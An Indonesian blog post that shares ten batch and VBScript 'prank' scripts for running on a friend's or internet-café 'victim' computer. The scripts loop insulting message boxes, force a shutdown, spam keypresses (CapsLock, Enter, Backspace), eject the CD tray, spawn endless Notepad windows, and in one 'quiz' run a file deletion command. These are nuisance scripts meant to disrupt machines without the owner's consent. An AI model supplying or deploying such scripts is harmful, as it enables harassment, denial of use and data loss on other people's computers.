Script Iseng Notepad

Bagi kalian yang pengen iseng di komputer temen.warnet silahkan dipake



Trik :

1. Membuat message box yang selalu keluar :
copy:

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

Simpan dengan format *.bat
Yang ini hanya bisa di close mungkin dengan process hacker gan, sama taskmngr nggak bisa ...

2. Bikin komputer korban shutdown dan message box keluar
copy:

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"

Simpan dengan format *.bat juga ...

3. Membuat Capslock terus menyala
copy:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Simpan dengan format *.vbs, bisa di close sama Task Manager atau PH

4. Membuka dan menutup CD/DVD komputer korban
copy:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan dengan format *.vbs juga ya gan!

5. Membuat vbscript terus muncul
copy:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Simpan dengan format *.vbs, mungkin sama taskmngr bisa di close ...

6. Terus - menerus menekan tombol "backspace"
copy:

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan dengan format *.vbs, pasti yang berformat *vbs bisa di kill sama taskmngr

7. Otomatis menulis "Lu jelek banget sih" di notepad atau di word
copy:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "kunjungi www.blogloverzz.blogspot.com"
loop

Simpan dengan format *.vbs, kunjungi blogloverzz nya terserah agan ganti apa aja bisa di ganti ...

8. Terus - menerus membuka notepad
copy:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan dengan format *.bat, bisa juga di ganti apa yang mau di bukanya, asalkan tau di mana disimpennya ...

9. Sama dengan trik nomor tujuh, tapi berbeda khas
copy:


WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

Ganti sendkeysnya, dan simpan dengan format *.vbs ...

10. Membuat kuis
copy:

@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
msg * kunjungi blogloverzz.blogspot.com
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan dengan format *.bat ...


Udah saya coba dan sukses,,, hehe walaupun sempat diomelin ama ORTU
Jangan lupa Folllow dan Kommengtarnya ya :)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

0 komentar:

Poskan Komentar